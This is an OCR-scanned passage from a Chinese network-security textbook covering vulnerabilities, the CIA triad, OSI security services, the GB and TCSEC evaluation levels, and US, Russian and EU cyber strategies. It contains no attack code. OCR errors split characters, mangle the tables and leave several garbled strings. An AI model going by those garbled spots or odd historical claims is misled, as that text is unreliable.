为 有 意 漏洞 和 无 意 漏洞 两 种 。 有 意 漏洞 是 软件 代码 编写 者 有 意 设置 的 ,目的 在 于 当 失 去 对 
系统 的 访问 权时 , 仍 能 进入 系统 。 无 意 漏洞 是 指 在 编写 软件 代码 时 无 意 留 下 的 缺陷 或 不 足 。 

据 统计 ,目前 发 现 的 系统 安全 漏洞 的 数量 已 经 接近 病毒 的 数量 。 典 型 的 安全 漏洞 如 和 远 
程 获得 超级 用 户 root 权限 .远程 过 程 调用 (RPC) 服 务 以 及 它 所 安排 的 无 口令 入 口 。 

目前 流行 的 许多 操作 系统 均 存 在 网 络 安全 漏洞 ,如 UNIX 和 Windows。 黑 客 往往 利用 
这 些 操作 系统 本 身 存 在 的 安全 漏洞 侵入 系统 ,具体 包括 以 下 两 个 方面 。 

O 稳定 性 和 可 扩充 性 方面 。 由 于 设计 的 系统 不 规范 .不 合理 以 及 缺乏 安全 性 考虑 , 因 
而 使 其 受到 影响 。 网 络 应 用 的 需求 没有 引起 人 们 足够 的 重视 ,设计 和 选 型 考虑 欠 周 密 , 从 而 
使 网 络 功能 发 挥 受阻 ,影响 网 络 的 可 靠 性 .扩充 性 和 升级 换代 。 

@ 工作 站 网 卡 选 配 不 当 , 导 致 网 络 不 稳定 ,缺乏 安全 策略 。 许 多 站 点 在 防火 墙 配置 上 
无 意识 地 扩大 了 访问 权限 ,忽视 了 这 些 权 限 可 能 会 被 其 他 人 员 滥 用 的 情况 ;此 外 ,访问 控制 
配置 的 复杂 性 容易 导致 配置 错误 ,从 而 给 他 人 以 可 乘 之 机 。 

(2) TCP/IP 安全 : TCP/IP 原理 公开 ,存在 很 大 的 安全 隐患 ,缺乏 强健 的 安全 机 制 。 当 
安全 工具 发 现 并 努力 更 正 某 方面 的 安全 问题 时 ,其 他 的 安全 问题 又 出 现 了 。 因 此 ,黑客 总 可 
以 使 用 先进 的 手段 进行 攻击 。 

(3) 人 为 因素 : 包括 人 为 的 无 意 失误 、 恶 意 攻击 及 管理 缺失 ,来 自 内 部 用 户 的 安全 威胁 
远大 于 外 网 用 户 的 安全 威胁 。 使 用 者 缺乏 安全 意识 ,许多 应 用 服务 系统 在 访问 控制 及 安全 
通信 方面 考虑 较 少 ,如 果 系 统 设置 错误 ,很 容易 造成 损失 。 

整体 上 看 ,网络 安全 主要 有 4 种 基本 的 安全 威胁 : 信息 泄露 .完整 性 破坏 .拒绝 服务 , 非 
法 使 用 。 主 要 的 威胁 包括 : 

* 渗入 威胁 ,如 假冒 、 旁 路 、 授 权 侵 犯 ; 

© 植 人 威胁 ,如 特洛伊 木马 、 陷 门 。 


1.2 网 络 安 全 基本 知识 


互联 网 为 人 们 提供 了 快速 便捷 的 通信 手段 ,促进 了 计算 机 网 络 技术 在 社会 、 经 济 各 领 
域 的 广泛 应 用 ,同时 也 为 伺机 窃取 利益 信息 的 不 法 之 徒 提 供 了 犯罪 场地 。 随 着 计算 机 网 络 
应 用 范围 的 不 断 扩大 ,网络 安 全 问题 已 成 为 当今 社会 的 一 个 焦点 。 


1.2.1 网 络 安全 研究 内 容 


网 络 安全 包括 以 下 3 方面 的 内 容 。 

CD 计算 机 实体 的 安全 : 在 一 定 的 环境 下 ,对 网 络 系统 中 设备 的 安全 保护 。 

(2) 网 络 系统 运行 安全 : 在 实体 安全 前 提 下 ,保证 网 络 系统 不 受 偶然 的 或 恶意 的 威胁 ， 
能 够 连续 可 靠 地 运行 ,正常 的 网 络 服务 不 中 断 。 

(3) 信息 安全 : 在 网 络 内 存储 和 处 理 的 信息 资源 具有 绝对 的 保密 性 、 完 整 性 和 可 用 性 ， 
不 存在 被 泄露 .更 改 和 破坏 的 风险 ,确保 网 络 系统 的 信息 安全 是 网 络 安全 的 目标 。 

* 保密 性 (confidentiality) : 防止 信息 非 授权 访问 或 泄露 。 信 息 只 限于 授权 用 户 使 用 ， 

保密 性 主要 通过 信息 加 密 、 身 份 认 证 ,访问 控制 ,安全 通信 协议 等 技术 实现 。 信 息 加 
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密 是 防止 信息 非法 泄露 的 最 基本 的 手段 。 

* 完整 性 (integrity) : 保证 信息 不 被 非法 改动 和 销毁 。 保 密 性 强调 信息 不 能 非法 汇 
露 , 而 完整 性 强调 信息 在 存储 和 传输 过 程 中 不 能 被 偶然 或 蓄意 修改 、 删 除 、 伪 造 、 添 
加 、 破 坏 或 丢失 ,信息 在 存储 和 传输 过 程 中 必须 保持 原样 。 信 息 完整 性 表明 了 信息 
的 可 靠 性 \ 正 确 性 有 效 性 和 一 致 性 ,只 有 完整 的 信息 才 是 可 信任 的 信息 。 

* 可 用 性 (availability) : 保证 网 络 资源 随时 可 被 合法 用 户 访问 ,是 信息 资源 容许 授权 
用 户 按 需 访问 的 特性 。 有 效 性 是 信息 系统 面向 用 户 服务 的 安全 特性 。 信 息 系 统 只 
有 持续 有 效 ,授权 用 户 才能 随时 随地 根据 自己 的 需要 访问 信息 系统 提供 的 服务 。 

完整 的 网 络 信息 安全 体系 至 少 应 包括 3 类 措施 。 

。 社会 的 法 律 政策 、 安 全 的 规章 制度 以 及 安全 教育 等 外 部 软环境 。 

* 技术 方面 的 措施 ,如 防火 墙 技术 网络 防 毒 . 信 息 加 密 存 储 与 通信 、 身 份 验证 、 授 
权 等 。 

。 审计 和 管理 措施 ,同时 包含 了 技术 与 社会 措施 。 

保证 网 络 安 全 的 技术 手段 主要 包括 : 

。 信息 加 密 : 数据 传输 加 密 、 数 据 存 储 加 密 数据 完整 性 鉴别 和 密 钥 管理 。 

。 身份 验证 和 授权 管理 : 实体 访问 控制 .数据 访问 控制 。 

。 安全 防御 : 防火 墙 技术 、 防 病毒 技术 、 网 络 介质 和 通信 和 链 路 的 保护 。 

。 安全 审计 和 管理 : 网 络 实时 监控 ,安全 策略 审计 和 漏洞 扫描 。 


1.2.2 网 络 安全 体系 结构 


当前 ,通用 的 网 络 层次 标准 有 OSI 和 TCP/IP 两 种 。OSI 是 理论 标准 ,TCP/IP 是 工业 
的 事实 标准 。 由 于 不 同 的 局 域 网 有 不 同 的 网 络 协议 ,为 了 使 不 同 的 网 络 能 够 互联 ,必须 建立 
统一 的 网 络 互 联 协议 。 为 此 ,ISO( 国 际 标准 化 组 织 ) 提 出 了 网 络 互联 协议 的 基本 框架 , 称 为 
开放 系统 互 连 (OSI) 参 考 模型 。 网 络 体系 层次 见 表 1. 2. 1, 它 将 整个 网 络 的 功能 划分 成 7 个 
层次 ,应 用 层 、 表 示 层 、 会 话 层 、 传 输 层 被 归 为 高 层 ,而 网 络 层 、 数 据 链 路 层 、 物 理 层 被 归 为 低 
层 。 高 层 负责 主机 之 间 的 数据 传输 ,低层 负责 网 络 数据 传输 。 


表 1.2.1 网 络 体系 层次 
OSI 模型 主要 功能 常见 的 协议 |TCP/IP 网 络 主要 功能 常见 的 协议 
应 用 层 提供 应 用 程序 间 通 信 | HTTP、FTP 


NBSSN Net- 


BIOS. LPP 用 层 提供 应 用 程序 接口 HTTP,FTP 


g 


表示 层 数据 格式 .数据 加 密 


会 话 层 建立 ,维护 .管理 会 话 | RPC、LDAP 


传输 层 ”| 建立 主机 端 到 端 连接 |TCP.UDP | 传输 层 | 建立 端 到 端 连接 | TCPLUDP 
网 络 层 。 “| 寻 址 和 路 由 选择 。 ”|IP.ICMP | 互联 网 层 “| 寻 址 和 路 由 选择 | IP.ICMP 
数据 链 路 层 | 介质 访问 和 链 路 管理 | PPP 

网 络 接口 层 二 进 制 数据 流传 输 和 PPP 


物理 层 比特 流传 输 物理 介质 访问 
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层 与 层 之 间 的 联系 是 通过 各 层 之 间 的 接口 进行 的 ,上 层 通过 接口 向 下 层 提出 服务 请 求 ， 
下 层 通过 接口 向 上 层 提供 服务 。 除 物理 层 之 外 ,互联 的 网 络 各 对 等 层 之 间 均 不 存在 直接 的 
通信 关系 ,而 是 通过 各 对 等 层 之 间 的 通信 协议 进行 通信 ,只 有 两 个 物理 层 之 间 通 过 传输 介质 
进行 真正 的 数据 通信 。 

1. OSI 参考 模型 

OSI 参考 模型 是 研究 .设计 新 的 计算 机 网 络 系统 和 评估 、 改 进 现 有 系统 的 理论 依据 ,是 
理解 和 实现 网 络 安全 的 基础 。OSI 安全 参考 模型 中 主要 包括 安全 服务 (security service) , % 
全 机 制 (security mechanism) 和 安全 管理 (security management) 。 

网 络 的 安全 服务 包括 以 下 内 容 。 

。 对 等 实体 认证 服务 : 实体 的 合法 性 、 真 实 性 确认 。 

。 访问 控制 服务 : 防止 对 任何 资源 的 非 授权 访问 。 

。 数据 保密 服务 : 加 密 保护 ,防止 被 截获 的 数据 泄密 。 

。 数据 完整 性 服务 : 使 消息 的 接收 者 能 够 发 现 消息 是 否 被 修改 ,是 否 被 攻击 者 用 假 消 

息 换 掉 。 

。 数据 源 点 认证 服务 : 数据 来 自 真正 的 源 点 ,以 防 假冒 。 

。 信息 流 安全 服务 : 通过 流量 填充 阻止 非法 流量 分 析 。 

。 不 可 否认 服务 : 防止 对 数据 提交 的 否认 。 

为 了 实现 这 些 安全 服务 ,需要 一 系列 安全 机 制作 为 支撑 ,具体 如 下 所 示 。 

。 加 密 机 制 : 应 用 现代 密码 学 理论 确保 数据 的 机 密 性 。 

。 数字 签名 机 制 : 保证 数据 的 完整 性 和 不 可 否认 性 。 

。 访问 控制 机 制 : 与 实体 认证 相关 , 且 要 牺牲 网 络 性 能 。 

。 数据 完整 性 机 制 : 保证 数据 在 传输 过 程 中 不 被 非法 入 侵 自 改 。 

。 认证 交换 机 制 : 实现 站 点 , 报 文 .用 户 和 进程 认证 等 。 

。 流量 填充 机 制 : 针对 流量 分 析 攻 击 而 建立 的 机 制 。 

。 路 由 控制 机 制 : 可 以 指定 数据 通过 网 络 的 路 径 。 

。 公证 机 制 : 用 数字 签名 技术 由 第 三 方 提 供 公正 仲裁 。 

2. 网 络 安全 控制 系统 

通过 对 网 络 应 用 的 全 面 了 解 ,按照 安全 风险 、 需 求 分 析 结 果 安全 策略 以 及 安全 目标 ,在 
进行 安全 控制 系统 设计 时 应 从 物理 安全 、 系 统 安全 、 网 络 安全 、 应 用 安全 ,管理 安全 等 方面 加 
以 考虑 。 

CD 物理 安全 : 是 保障 整个 网 络 系统 安全 的 前 提 , 保 护 计算 机 网 络 的 物理 通路 不 被 损 
坏 \ 不 被 窃听 以 及 不 被 攻击 和 干扰 。 它 包括 3 个 方面 : 环境 安全 ,设备 安全 、 媒 体 安全 。 防 
范 措施 包括 对 重要 信息 存储 、 收 发 部 门 进行 屏蔽 处 理 , 防 止 信号 外 泄 ;对 局 域 网 传输 线路 传 
输 辐射 的 抑制 ;对 终端 设备 辐射 的 防范 。 

(2) 系统 安全 : 包括 网 络 结构 安全 、 操 作 系统 安全 和 应 用 系统 安全 。 网 络 结构 安全 指 
网 络 拓扑 结构 是 否 合理 、 线 路 是 否 有 元 余 、 路 由 是 否 元 余 、 防 止 单 点 失败 等 。 安 全 防范 策略 
包括 : 尽量 采用 安全 性 较 高 的 网 络 操作 系统 ,并 进行 必要 的 安全 配置 ;关闭 不 常用 却 存在 安 
全 隐患 的 应 用 ;对 保存 有 用 户 信息 及 其 口令 的 关键 文件 使 用 权限 进行 严格 限制 ;通过 配备 安 
全 扫描 系统 对 操作 系统 进行 安全 性 扫描 ,及 时 发 现 安全 漏洞 ;应 用 服务 器 应 关闭 一 些 不 经 常 
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使 用 的 协议 及 协议 端口 号 ,加 强身 份 认证 ,严格 限制 登录 者 的 操作 权限 。 

(3) 网 络 安全 : 是 整个 安全 解决 方案 的 关键 ,通过 访问 控制 .通信 保密 ,入侵 检测 、 网 络 
安全 扫描 系统 、 防 病毒 工具 等 措施 保障 。 隔 离 与 访问 控制 可 通过 严格 的 管理 制度 划分 虚拟 
子 网 (VLAN) ,配备 防火 墙 进行 ;防火 墙 是 实现 网 络 安全 最 基本 、 最 经 济 . 最 有 效 的 安全 措施 
之 一 , 它 通过 制定 严格 的 安全 策略 实现 内 外 网 络 或 内 部 网 络 不 同 信任 域 之 间 的 隔离 与 访问 
控制 ;通信 保密 使 得 数据 以 密 文 形式 在 网 络 上 传输 ,可 以 选择 链 路 层 加密 和 网 络 层 加 密 等 方 
式 ; 入 侵 检测 是 根据 已 有 攻击 手段 的 信息 代码 对 所 有 网 络 操作 行为 进行 实时 监控 .记录 ,并 
按 制定 的 策略 予以 响应 ,从 而 防止 针对 网 络 的 攻击 与 犯罪 行为 ;网 络 扫 撒 系统 可 以 对 网 络 中 
的 所 有 部 件 (Web 站 点 、 防 火 墙 路 由 器 、TCP/IP 及 相关 协议 服务 ) 进 行 攻击 性 扫描 、 分 析 和 
评估 ,发 现 并 报告 系统 存在 的 弱点 和 漏洞 ,评估 安全 风险 ,建议 补救 措施 ;病毒 防护 也 是 网 络 
安全 建设 的 重要 环节 之 一 。 反 病毒 技术 包括 预防 病毒 .检测 病毒 和 杀毒 3 种 技术 。 

(4) 应 用 安全 : 表现 在 内 部 网 络 系统 中 资源 共享 和 信息 存储 等 方面 。 严 格 控制 内 部 员 
工 对 网 络 共享 资源 的 使 用 ,在 内 部 子 网 中 一 般 不 开放 共享 目录 ,对 有 经 常 交 换 信 息 需 求 的 用 
户 , 在 共享 时 必须 加 装 口令 认证 机 制 。 对 数据 库 服 务 器 中 的 数据 库 必须 做 安全 备份 ,通过 网 
络 备份 系统 也 可 以 进行 远程 备份 存储 。 

(5) 管理 安全 : 通过 制定 健全 的 安全 管理 体制 .构建 安全 管理 平台 、 增 强人 员 的 安全 防 
范 意 识 制定 健全 的 安全 管理 体制 是 网 络 安全 得 以 实现 的 重要 保证 ;应 经 常 对 人 员 进 行 网 络 
安全 防范 意识 的 培训 ,全 面 提 高 人 员 的 网 络 安 全 防范 意识 ;组 建安 全 管理 子 网 ,安装 集中 统 
一 的 安全 管理 软件 ,如 病毒 软件 管理 系统 、 网 络 设备 管理 系统 以 及 网 络 安全 设备 统一 管理 软 
件 , 通 过 安全 管理 平台 实现 全 网 的 安全 管理 。 

3. 安全 体系 设计 

安全 体系 设计 原则 包括 以 下 3 个 方面 。 

CD 需求 .风险 .代价 平衡 分 析 的 原则 : 对 任 一 网 络 来 说 ,绝对 安全 难以 达到 。 要 进行 
实际 分 析 ,对 网 络 面临 的 威胁 及 可 能 承担 的 风险 进行 定性 与 定量 相 结合 的 分 析 , 制 定 规范 和 
措施 ,确定 系统 安全 策略 。 

(2) 一 致 性 原则 : 是 指 * 网 络 安全 问题 贯穿 网 络 生命 周 期 始终 ”, 制 定 的 安全 体系 结构 
必须 与 网 络 的 安全 需求 一 致 。 

G) 易 操作 性 原则 : 安全 措施 要 具有 便利 性 和 可 操作 性 ,考虑 管理 人 员 的 自身 素质 ,对 
操作 人 员 的 要 求 不 宜 过 高 。 

4. 网 络 安全 策略 

网 络 安 全 策略 应 考虑 安全 管理 策略 和 安全 技术 实施 策略 两 个 方面 。 

(1) 安全 管理 策略 : 即使 是 最 好 的 、 最 值得 信赖 的 系统 安全 措施 ,也 不 能 完全 由 计算 机 
系统 独立 完成 ,需要 建立 完备 的 安全 组 织 和 管理 制度 ,以 约束 操作 人 员 。 

(2) 安全 技术 实施 策略 : 要 针对 网 络 、 操 作 系统 数据库 .信息 共 享 授权 提出 具体 的 
措施 。 
计算 机 信息 系统 的 安全 管理 主要 基于 3 个 原则 , 即 多 人 负责 原则 、 任 期 有 限 原 则 、 职 责 
分 离 原 则 。 由 于 网 络 互联 在 数据 链 路 层 、 网 络 层 、 传 输 层 .应 用 层 等 不 同 协议 层 均 有 体现 , 且 
各 个 层 的 功能 和 安全 特性 不 同 ,因而 其 网 络 安全 措施 也 不 相同 。 
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物理 层 安全 涉及 传输 介质 的 安全 特性 , 抗 干扰 \ 防 窃听 是 物理 层 安全 措施 制定 的 重点 。 

在 数据 链 路 层 ,可 以 通过 建立 虚拟 局 域 网 ,对 物理 和 逻辑 网 段 进 行 有 效 的 分 割 和 隔离 ， 
消除 不 同安 全 级 别 逻辑 网 段 间 的 窃听 风险 。 

在 网 络 层 ,可 通过 对 不 同 子 网 的 定义 和 对 路 由 器 的 路 由 表 控 制 限制 子 网 间 的 通信 ; 同 
时 ,利用 网 关 的 安全 控制 能 力 ,限制 节点 的 通信 和 和 应 用 服务 ,加 强 对 外 部 用 户 的 识别 和 验证 
能 力 。 


1.2.3 网 络 安全 评价 标准 


评价 标准 中 比较 流行 的 是 1985 年 美国 国防 部 指定 的 《可 信 计 算 机 系统 评估 准则 》, 各 国 
根据 自己 的 国情 也 都 制定 了 相关 的 标准 。 

1. 中 国 评价 标准 

在 我 国 ,1999 年 10 月 经 过 国家 质量 技术 监督 局 批准 发 布 的 (计算 机 信息 系统 安全 保护 
等 级 划分 准则 ) 将 计算 机 安全 保护 划分 为 以 下 5 个 级 别 。 

第 1 级 为 用 户 自主 保护 级 (GB1 ZER): 它 的 安全 保护 机 制 使 用 户 具 备 自主 安全 保护 
的 能 力 ,保护 用 户 的 信息 免 受 非法 的 读 写 破 坏 。 

第 2 级 为 系统 审计 保护 级 (GB2 安全 级 ): 除 具 备 第 一 级 所 有 的 安全 保护 功能 外 ,要 求 
创建 和 维护 访问 的 审计 跟踪 记录 ,使 所 有 用 户 对 自己 的 行为 的 合法 性 负责 。 

第 3 级 为 安全 标记 保护 级 (GB3 安全 级 ): 除 继承 前 一 个 级 别 的 安全 功能 外 ,还 要 求 以 
访问 对 象 标记 的 安全 级 别 限 制 访问 者 的 访问 权限 ,实现 对 访问 对 象 的 强制 保护 。 

第 4 级 为 结构 化 保护 级 (GB4 安全 级 ): 在 继承 前 面 安全 级 别 安 全 功能 的 基础 上 ,将 安 
全 保护 机 制 划 分 为 关键 部 分 和 非 关键 部 分 。 对 关键 部 分 ,直接 控制 访问 者 对 访问 对 象 的 存 
取 , 从 而 加 强 系统 的 抗 渗透 能 力 。 

第 5 级 为 访问 验证 保护 级 (GB5 安全 级 ): 这 一 级 别 特别 增设 了 访问 验证 功能 ,负责 仲 
裁 访问 者 对 访问 对 象 的 所 有 访问 活动 。 

从 20 世纪 80 年 代 中 期 开始 ,我 国 自主 制定 和 采用 了 一 批 相应 的 信息 安全 标准 。 但 是 ， 
应 该 承认 ,标准 的 制定 需要 较为 广泛 的 应 用 经 验 和 较为 深入 的 研究 背景 。 这 两 方面 的 差距 
使 我 国 的 信息 安全 标准 化 工作 与 国际 已 有 的 工作 相 比 ,覆盖 范围 还 不 够 大 ,宏观 和 微观 的 指 
导 作 用 也 有 待 进一步 提高 。 

2. 国际 评价 标准 

美国 国防 部 开发 的 计算 机 安全 标准 一 一 《可 信 计 算 机 系统 评估 准则 》(Trusted 
Computer System Evaluation Criteria, TCSEC) . HI jj 2& Zz 4- F Hz 45. AMA 1985 年 成 为 美国 
国防 部 的 标准 以 来 ,一直 是 评估 多 用 户主 机 和 小 型 操作 系统 的 主要 方法 。 其 他 子 系统 (如 数 
据 库 和 网 络 ) 也 一 直 用 橙 皮 书 解释 评估 。 橙 皮 书 把 安全 的 级 别 从 低 到 高 分 成 4 个 类 别 : 
D 类 C 类 .B 类 和 A 类 ,每 类 又 分 几 个 级 别 , 见 表 1. 2.2。 

D 级 是 最 低 的 安全 级 别 , 拥 有 这 个 级 别 的 操作 系统 就 像 一 个 门户 大 开 的 房子 ,任何 人 都 
可 以 自由 进出 ,是 完全 不 可 信任 的 。 对 于 硬件 来 说 ,没有 任何 保护 措施 ,操作 系统 容易 受到 
损害 ,没有 系统 访问 限制 和 数据 访问 限制 ,任何 人 不 需 任 何 账户 都 可 以 进入 系统 ,不 受 任何 
限制 都 可 以 访问 他 人 的 数据 文件 。 属 于 这 个 级 别 的 操作 系统 有 DOS 和 Windows 98 等 。 
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51.2.2. 网 络 安全 评价 级 别 


类 l 级 别 名 R 主要 特征 
D D 低级 保护 没有 安全 保护 
C1 自主 安全 保护 自主 存储 控制 
C2 受 控 存 储 控制 单独 的 可 查 性 ,安全 标识 
Bl 标识 安全 保护 强制 存 取 控制 ,安全 标识 
B B2 结构 化 保护 面向 安全 的 体系 结构 , 较 好 的 抗 渗透 能 力 
安全 区 域 存 取 监控 ,高 抗 渗 透 能 力 
A A 验证 设计 形式 化 的 最 高 级 描述 和 验证 


Cl 是 C 类 的 一 个 安全 子 级 。C1 又 称 选 择 性 安全 保护 (discretionary security 
protection) 系 统 , 它 描述 了 一 个 典型 的 用 在 UNIX 系统 上 的 安全 级 别 。 这 种 级 别 的 系统 对 
硬件 有 某 种 程度 的 保护 ,如 用 户 拥有 注册 账号 和 口令 ,系统 通过 账号 和 口令 识别 用 户 是 否 合 
法 ,并 决定 用 户 对 程序 和 信息 拥有 何 种 访问 权限 ,但 硬件 受到 损害 的 可 能 性 仍然 存在 。 

C2 级 除了 包含 C1 级 的 特征 外 ,还 具有 访问 控制 环境 (controlled access environment? 
权力 , 即 具 有 进一步 限制 用 户 执行 某 些 命令 或 者 访问 某 些 文件 的 权限 ,而 且 还 加 入 了 身份 认 
证 等 级 。 另 外 ,系统 对 事件 进行 审计 ,并 写 入 日 志 中 .如何 时 开机 、 用 户 在 何 时 何 地 登录 系统 
等 ,通过 查看 日 志 就 可 以 发 现 人 侵 痕 迹 。 审 计 除 了 可 以 记录 下 系统 管理 员 执 行 的 活动 以 外 ， 
还 加 入 了 身份 认证 级 别 ,缺点 在 于 它 需 要 额外 的 处 理 时 间 和 磁盘 空间 。 

使 用 附加 身份 验证 就 可 以 让 一 个 C2 级 系统 用 户 在 不 是 超级 用 户 的 情况 下 有 权 执 行 系 
统管 理 任务 。 授 权 分 级 使 系统 管理 员 能 够 给 用 户 分 组 ,授予 他 们 访问 某 些 程序 的 权限 或 访 
问 特定 的 目录 。 能 够 达到 C2 级 别 的 常见 操作 系统 有 : UNIX 系统 ; @Novell 3. X 或 者 
更 高 的 版 本 ; (9 Windows NT, Windows 2000 和 Windows 2003, 

也 级 中 有 3 个 级 别 ,Bl 级 即 标志 安全 保护 ( labeled security protection) ,是 支持 多 级 安 
全 (如 秘密 和 绝密 ) 的 第 一 个 级 别 ,这 个 级 别 说 明 处 于 强制 性 访问 控制 之 下 的 对 象 ,系统 不 允 
许 文 件 的 拥有 者 改变 其 许可 权限 。 这 种 安全 级 别 的 计算 机 系统 一 般 在 政府 机 构 中 ,如 国防 
部 和 国家 安全 局 的 计算 机 系统 。 

B2 级 ,又 叫 结构 保护 (Cstructured protection) 级 别 , 它 要 求 计算 机 系统 中 所 有 的 对 象 都 
要 加 上 标签 ,而 且 给 设备 (磁盘 、 磁 带 和 终端 ) 分 配 单个 或 者 多 个 安全 级 别 。 

B3 级 ,又 叫 安全 区 域 (security domain) 级 别 , 使 用 安装 硬件 的 方式 加 强 区 域 的 安全 。 
例如 ,内 存 管理 硬件 用 于 使 安全 区 域 免 遭 无 授权 访问 或 更 改 其 他 安全 区 域 的 对 象 。 该 级 别 
也 要 求 用 户 通过 一 条 可 信任 途径 连接 到 系统 上 。 

A 级 ,又 称 验证 设计 (verified design) 级 别 , 是 当前 橙 皮 书 的 最 高 级 别 , 它 包含 了 一 个 严 
格 的 设计 、 控 制 和 验证 过 程 。 安 全 级 别 设 计 必 须 从 数学 角度 上 进行 验证 ,而 且 必 须 进行 秘密 
通道 和 可 信任 分 布 分 析 。 

可 信任 分 布 (trusted distribution) 的 含义 是 : 硬件 和 软件 在 物理 传输 过 程 中 受到 保护 ， 
以 防止 破坏 安全 系统 。 
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1.3 网络 空间 安全 国内 外 战略 


1.3.1 美国 网 络 空 间 安 全 国家 战略 


美国 是 世界 上 最 早 制定 信息 安全 法 律 的 国家 。1946 年 ,美国 针对 计算 机 的 出 现 出 台 
《原子 能 法 》。1947 年 ,美国 出 台 了 《国家 安全 法 》。1966 年 ,( 信 息 自 由 法 ) 颁 布 ,界定 了 美国 
公民 可 以 公开 及 不 可 以 公开 的 信息 内 容 , 并 从 国家 安全 的 角度 对 信息 安全 进行 了 边界 设 定 。 
从 这 一 阶段 就 可 以 看 到 ,美国 的 信息 安全 意识 开始 觉醒 。1947 年 ,美国 国家 安全 委员 会 正 
式 成 立 ,主席 由 总 统 亲自 担任 ,历届 总 统 都 非常 倚重 , 它 逐 渐 成 为 美国 重大 战略 的 核心 组 织 
机 构 。2000 年 ,美国 (国家 战略 发 展 报告 发布, 信息 安全 战略 被 正式 列 为 国家 战略 。2001 
年 ,“9。11” 事 件 爆 发 ,美国 政府 更 加 认识 到 信息 安全 的 重要 性 ,并 加 大 投资 力度 加 强 打击 网 
络 恐 怖 行为 和 加 大 信息 安全 的 开支 。2003 年 2 月 ,美国 正式 发 布 了 《保护 网 络 空间 的 国家 
战略 》, 提 出 三 大 战略 目标 和 五 项 重点 任务 。 在 削减 传统 武器 的 同时 ,大 幅 增 加 网 络 攻击 武 
器 的 投入 ,并 筹建 网 军 司令 部 ,通过 网 络 威慑 谋求 制 网 权 。 美 国 优势 显著 : 在 全 球 互联 网 13 
台 根 服务 器 中 ,其 中 10 台 在 美国 ;微软 的 操作 系统 已 经 占据 个 人 计算 机 操作 系统 的 85% VÀ 
上 ;思科 核心 交换 机 遍布 全 球 网 络 节点 ;英特尔 的 CPU 占据 全 球 计算 机 90% 以 上 的 市 场 份 
额 。 美 国 对 互联 网 的 控制 程度 已 经 超出 任何 国家 ,一 旦 网 络 战 爆发 ,美国 将 利用 独特 的 优势 
轻松 地 让 别 国 网 络 进入 瘫痪 状态 。2015 4E 2 月 6 日 ,美国 联邦 政府 发 布 了 2015 年 版 (国家 
安全 战略 》。 白宫 网 站 说 明了 该 战略 为 利用 美国 强 有 力 并 且 可 持续 的 领导 地 位 促进 美国 国 
家 利益 、 普 世 价 值 和 基于 规则 的 国际 秩序 提供 了 愿景 和 策略 。 该 战略 还 首次 公开 表示 美国 
国防 司令 部 可 以 用 网 络 行动 破坏 敌人 的 指令 和 与 军 方 相关 的 关键 基础 设施 .武器 ,展示 了 美 
国 对 网 络 攻击 的 进攻 和 打击 网 络 进攻 者 的 决心 。 这 是 美军 自从 成 立 网 络 司令 部 以 来 ,首次 
在 国家 战略 中 提出 网 络 作战 的 明确 指示 ,还 将 加 强 网 络 攻 击 情 报 收集 能 力 , 加 强 与 亚太 区 的 
盟国 合作 ,扩大 在 美军 网 络 空间 的 军属 作战 能 力 和 综合 实力 ,美军 网 络 作战 的 支持 力量 再 次 
加 强 。 


1.3.2 俄罗斯 网 络 空 间 安全 国家 战略 


俄罗斯 高 度 重视 网 络 空间 对 国家 安全 的 重要 性 ,并 建立 了 专门 机 构 和 颁布 相关 法 规 。 
1992 年 1 月 成 立 的 俄罗斯 国家 技术 委员 会 领导 国家 信息 安全 工作 ,主要 负责 执行 统一 的 技 
术 政 策 , 协 调 信 息 保护 领域 的 工作 。1995 年 ,俄罗斯 宪法 把 信息 安全 纳入 国家 安全 管理 范 
围 , 颁 布 了 《联邦 信息 、 信 息 化 和 信息 网 络 保护 法 》。 普 京 总 统 多 次 强调 :“ 信 息 资 源 和 信息 
基础 设施 已 经 成 为 争夺 世界 领先 地 位 的 舞台 ,未 来 的 政治 和 经 济 将 取决 于 信息 资源 。 "进入 
21 世纪 ,俄罗斯 将 信息 安全 纳入 国家 安全 战略 。 俄 罗斯 建立 了 完善 的 信息 保护 国家 系统 ， 
将 信息 安全 策略 分 为 全 权 安 全 政策 和 选择 性 安全 政策 两 类 ,只 有 当主 体 的 安全 能 力 不 低 于 
客体 临界 标记 时 ,信息 方 可 “向 上 ”传输 。2014 年 1 月 10 日 ,俄罗斯 联邦 委员 会 公布 了 《 俄 
罗斯 联邦 网 络 安全 战略 构想 》, 确 定 了 保障 网 络 安全 的 优先 事项 ,明确 规定 了 网 络 安 全 保障 
方向 ,采取 全 面 系 统 的 措施 保障 网 络 安全 。 根 据 报道 ,目前 俄罗斯 军 方 拥有 大 型 “僵尸 网 
络 ” 无 线 数据 通信 干扰 器 ,扫描 计 算 机 软件 .网 络 逻 辑 炸 弹 等 多 种 网 络 攻击 手段 。 俄 军 正在 
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研发 的 远 距 离 病毒 武器 能 对 敌 方 的 指挥 控制 系统 构成 直接 威胁 。 俄 军 的 网 络 作战 能 力 具有 
较 强 的 网 络 对 抗 侦 察 ,渗透 能 力 和 整体 破 网 能 力 。 俄 军 把 防止 和 对 抗 网 络 信息 侵略 提高 到 
国家 战略 高 度 ,成 立 了 向 总 统 负责 的 总 统 国家 信息 政策 委员 会 ,陆续 制定 了 网 络 信息 战 相关 
规划 ,以 加 强 对 信息 化 建设 的 领导 和 协调 ,加 快 信息 基础 设施 建设 。 俄 军 建立 了 特种 信息 部 
BA ,负责 实施 网 络 信息 战 攻防 行动 。 网 络 信息 战 已 经 被 俄 军 赋予 了 极 高 的 地 位 一 一 第 6 代 
战争 ”, 由 此 可 见 俄 军 对 网 络 作战 的 重视 程度 。 


1.3.3 欧盟 网 络 空间 安全 战略 


2007 年 ,爱沙尼亚 遭受 网 络 攻击 后 ,于 2008 年 发 布 了 欧盟 成 员 国 中 第 1 份 网 络 安全 战 
略 , 其 后 各 国 陆续 制定 同类 战略 。 巾 于 欧盟 各 国 的 国情 不 同 , 制 定 的 网 络 安全 技术 标准 、 术 
语 等 有 差异 化 ,各 自 为 战 ,无 法 进行 统一 安全 保障 工作 。2013 年 ,欧盟 各 国 达成 共识 《欧盟 
网 络 安 全 战略 ) 正 式 发 布 。 该 战略 从 国家 、 欧 盟 和 国际 3 个 层面 明确 了 各 利益 相关 方 在 维护 
网 络 安全 过 程 中 的 角色 。 欧 盟 的 网 络 安全 战略 中 还 附带 颁布 了 巩固 欧盟 信息 系统 安全 的 立 
法 建议 ,使 得 人 们 增强 了 网 络 购物 的 信心 ,刺激 了 经 济 增长 ,这 是 其 创新 所 在 。 为 了 打击 网 
